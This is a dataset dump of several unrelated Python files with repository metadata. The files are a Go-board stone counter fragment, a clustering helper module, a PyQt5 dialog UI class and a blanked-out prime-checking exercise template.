break
Bcnt = 0
Wcnt = 0
for l in range(1, N+1):
for q in range(1, N+1):
if field[l][q] == 1: #흑돌
Bcnt += 1
elif field[l][q] == 2: #백돌
Wcnt += 1
print("#{} {} {}".format(t+1, Bcnt, Wcnt))
|
[
"jdb960211@gmail.com"
] |
jdb960211@gmail.com
|
ec46f3d025b4c8f9a1a28ec7a4e09265e6806c5f
|
1b3c73cfd2c183861942d821b5f7b87cfde05687
|
/Clustering.py
|
ebee8512112a8b6ef2bf9157214257ebbb50b688
|
[] |
no_license
|
Cheereus/MathModel2020
|
d0e77d199701fe752298d3998578be58409c9ce3
|
752811a5550ff3d6ec4dc21f4880986e3fcf08f7
|
refs/heads/master
| 2023-04-27T15:00:28.332328
| 2021-04-27T02:56:52
| 2021-04-27T02:56:52
| 296,013,678
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 884
|
py
|
import numpy as np
from sklearn.cluster import KMeans, AgglomerativeClustering
from sklearn.neighbors import KNeighborsClassifier
from scipy.cluster.hierarchy import dendrogram, linkage, fcluster
import matplotlib.pyplot as plt
def k_means(X, k):
k_m_model = KMeans(n_clusters=k, max_iter=300, n_init=40, init='k-means++', n_jobs=-1)
k_m_model.fit(X)
return k_m_model.labels_.tolist()
def knn(X, y, k):
knn_model = KNeighborsClassifier(n_neighbors=k)
knn_model.fit(X, y)
return knn_model
def hca(X, k=None):
hca_model = linkage(X, 'ward')
return hca_model
# dendogram for hca
def hca_dendrogram(model):
plt.figure(figsize=(50, 10))
dendrogram(model, leaf_rotation=90., leaf_font_size=8)
plt.show()
# labels of hca
def hca_labels(model, n_clusters):
labels = fcluster(model, n_clusters, criterion='maxclust')
return labels
|
[
"fanwei1995@hotmail.com"
] |
fanwei1995@hotmail.com
|
425fec3232c22560f10257179343fe677eb7810a
|
94f304cb4c2ac2ad6ff1ee39725f46254c8838bc
|
/core/info/Ui_script.py
|
39b68de152e2eba395e13f524ec2b484d241ef11
|
[] |
no_license
|
kmolLin/python3_solve_dynamic
|
105bd70edaa5014e0ad76a9a3c66e43dc0fa5ad7
|
18f56e6958dd1816dfb7c26f4857aa3b41de9312
|
refs/heads/master
| 2021-06-03T10:19:44.551240
| 2016-09-23T13:22:52
| 2016-09-23T13:22:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,391
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/home/ahshoe/Desktop/Pyslvs/core/info/script.ui'
#
# Created by: PyQt5 UI code generator 5.7
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Info_Dialog(object):
def setupUi(self, Info_Dialog):
Info_Dialog.setObjectName("Info_Dialog")
Info_Dialog.setEnabled(True)
Info_Dialog.resize(408, 485)
Info_Dialog.setMinimumSize(QtCore.QSize(246, 346))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/edges.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Info_Dialog.setWindowIcon(icon)
Info_Dialog.setAutoFillBackground(True)
Info_Dialog.setSizeGripEnabled(True)
Info_Dialog.setModal(True)
self.verticalLayout = QtWidgets.QVBoxLayout(Info_Dialog)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.label = QtWidgets.QLabel(Info_Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label.sizePolicy().hasHeightForWidth())
self.label.setSizePolicy(sizePolicy)
self.label.setText("")
self.label.setPixmap(QtGui.QPixmap(":/icons/main.png"))
self.label.setObjectName("label")
self.horizontalLayout_2.addWidget(self.label)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.copy = QtWidgets.QPushButton(Info_Dialog)
self.copy.setContextMenuPolicy(QtCore.Qt.NoContextMenu)
self.copy.setAutoDefault(False)
self.copy.setObjectName("copy")
self.horizontalLayout_2.addWidget(self.copy)
self.save = QtWidgets.QPushButton(Info_Dialog)
self.save.setAutoDefault(False)
self.save.setObjectName("save")
self.horizontalLayout_2.addWidget(self.save)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.script = QtWidgets.QTextBrowser(Info_Dialog)
self.script.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAsNeeded)
self.script.setObjectName("script")
self.verticalLayout.addWidget(self.script)
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout.addItem(spacerItem1)
self.buttonBox = QtWidgets.QDialogButtonBox(Info_Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.buttonBox.sizePolicy().hasHeightForWidth())
self.buttonBox.setSizePolicy(sizePolicy)
self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Close|QtWidgets.QDialogButtonBox.Help)
self.buttonBox.setObjectName("buttonBox")
self.horizontalLayout.addWidget(self.buttonBox)
self.verticalLayout.addLayout(self.horizontalLayout)
self.retranslateUi(Info_Dialog)
self.buttonBox.rejected.connect(Info_Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Info_Dialog)
def retranslateUi(self, Info_Dialog):
_translate = QtCore.QCoreApplication.translate
Info_Dialog.setWindowTitle(_translate("Info_Dialog", "Python Script"))
self.label.setWhatsThis(_translate("Info_Dialog", "Pyslvs Icon!"))
self.copy.setText(_translate("Info_Dialog", "Copy"))
self.save.setText(_translate("Info_Dialog", "Save as..."))
self.buttonBox.setWhatsThis(_translate("Info_Dialog", "Click to exit"))
import icons_rc
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Info_Dialog = QtWidgets.QDialog()
ui = Ui_Info_Dialog()
ui.setupUi(Info_Dialog)
Info_Dialog.show()
sys.exit(app.exec_())
|
[
"smpss91341@gmail.com"
] |
smpss91341@gmail.com
|
21c56687f092c048fd987093b694fa1b9cdba953
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/110_concurrency_parallelism/_exercises/templates/Mastering Concurrency in Python/Chapter10/example3.py
|
22936bfe66daaa8030fb20b3750380ec1e244ec1
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395
| 2023-05-29T17:09:11
| 2023-05-29T17:09:11
| 220,583,118
| 3
| 2
| null | 2023-02-16T03:08:10
| 2019-11-09T02:58:47
|
Python
|
UTF-8
|
Python
| false
| false
| 698
|
py
|
# # ch9/example1.py
#
# ____ ma__ ______ sqrt
# ____ t_i_ ______ d_t_ __ timer
#
# ___ is_prime x
# print('Processing @...' ?
#
# __ ? < 2
# print('@ is not a prime number.' ?
#
# ____ ? __ 2
# print('@ is a prime number.' ?
#
# ____ ? % 2 __ 0
# print('@ is not a prime number.' ?
#
# ____
# limit _ __. sq.. ? + 1
# ___ i __ ra.. 3 ? 2
# __ ? % ? __ 0
# print('@ is not a prime number.' ?
# r_
#
# print('@ is a prime number.' ?
#
# __ _______ __ _______
#
# start _ ti..
# ? 9637529763296797)
# ? 427920331)
# ? 157)
# print('Took @.2_ seconds.' t.. - s..
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.